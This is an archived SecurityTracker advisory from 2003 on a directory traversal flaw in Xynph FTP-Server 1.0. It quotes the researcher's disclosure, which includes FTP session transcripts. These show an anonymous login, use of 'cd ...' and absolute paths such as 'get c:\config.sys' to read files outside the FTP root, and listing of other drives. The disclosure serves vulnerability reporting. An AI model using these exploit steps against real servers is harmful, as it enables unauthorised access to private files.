SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (File Transfer/Sharing)  >   Xynph FTP-Server Vendors:   Digital Sector
Xynph FTP-Server Input Validation Flaw Discloses Files on the System to Remote Users
SecurityTracker Alert ID:  1005914
SecurityTracker URL:  http://securitytracker.com/id/1005914
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jan 12 2003
Impact:   Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  
Version(s): 1.0
Description:   An input validation vulnerability was reported in the Xynph FTP-Server. A remote authenticated user can traverse directories and view files on the system.

It is reported that a remote authenticated user, including an anonymous user, can issue the following command to change to a higher level directory:

cd ...

A remote authenticated user can also specify a file by pathname to view the specified file (e.g., get c:\config.sys).

Either of these bugs allows the remote authenticated user to traverse the directory and obtain any files that are readable by the FTP server.

[Editor's note: The report states that version 1.0 is vulnerable. The current version of the software appears to be 2.0, but the report does not indicate whether 2.0 is vulnerable or not.]

Impact:   A remote user can view files on the system that are readable by the FTP server.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.digital-sector.de/ (Links to External Site)
Cause:   Access control error, Input validation error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Vulnerabilties in Xynph FTP Server 1.0


Vulnerabilties in Xynph FTP Server 1.0


Xynph FTP Server allows Directory Traversal

Example:
#######################################################
Verbindung mit zero-x.
220 Herzlich Willkommen!
<-Xynph FTP-Server->
Benutzer (zero-x:(none)): anonymous
331 Password required for anonymous.
Kennwort: billsucks
230 User anonymous logged in.
Ftp> pwd
257 "C:/Temp/" is current directory.
Ftp> cd ..
501 CWD failed. No permission
Ftp> cd ...
250 CWD command successful. "C:/Temp/.../" is current directory.
Ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw-   1 ftp      ftp            0 Sep 21  2002 .
drw-rw-rw-   1 ftp      ftp            0 Sep 21  2002 ..
drw-rw-rw-   1 ftp      ftp            0 Sep 21  2002 Programme
drw-rw-rw-   1 ftp      ftp            0 Sep 21  2002 command.com
drw-rw-rw-   1 ftp      ftp            0 Sep 21  2002 Autoexec.bat
drw-rw-rw-   1 ftp      ftp            0 Sep 21  2002 config.sys
drw-rw-rw-   1 ftp      ftp            0 Sep 21  2002 Windows
drw-rw-rw-   1 ftp      ftp            0 Sep 21  2002 Cygwin
drw-rw-rw-   1 ftp      ftp            0 Sep 21  2002 Top-Secret
226 File sent ok
Ftp: 31337 Bytes empfangen in 0.00Sekunden 175000.00KB/Sek.
Ftp> get config.sys
200 Port command successful.
150 Opening data connection for config.sys.
226 File sent ok
Ftp: 1337 Bytes empfangen in 0.06Sekunden 2.92KB/Sek.
Ftp>
#######################################################


and you can read all drives.

Example:
#######################################################
Ftp> open zero-x
Verbindung mit zero-x.
220 Herzlich Willkommen!
<-Xynph FTP-Server->
Benutzer (zero-x:(none)): anonymous
331 Password required for anonymous.
Kennwort: billsucks
230 User anonymous logged in.
Ftp> get c:\config.sys
200 Port command successful.
150 Opening data connection for c:\config.sys.
226 File sent ok
Ftp: 1337 Bytes empfangen in 0.00Sekunden 175000.00KB/Sek.
Ftp> dir a:\
200 Port command successful.
150 Opening data connection for directory list.
-rw-rw-rw-   1 ftp      ftp       305113 Dec 15  2002 1.jpg
-rw-rw-rw-   1 ftp      ftp       313497 Dec 15  2002 4.jpg
-rw-rw-rw-   1 ftp      ftp       326046 Dec 15  2002 2.jpg
-rw-rw-rw-   1 ftp      ftp       357910 Dec 15  2002 3.jpg
226 File sent ok
Ftp: 31337 Bytes empfangen in 0.00Sekunden 244000.00KB/Sek.
Ftp>
#######################################################

~~ Zero X, member of www.lobnan.de ~~

Greets to:

www.lobnan.de (my Team)
www.he-crew.de
www.es-crew.de
www.bhc-security.de
www.dcw-group.net
-- 
______________________________________________
http://www.linuxmail.org/
Now with POP3/IMAP access for only US$19.95/yr

Powered by Outblaze

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC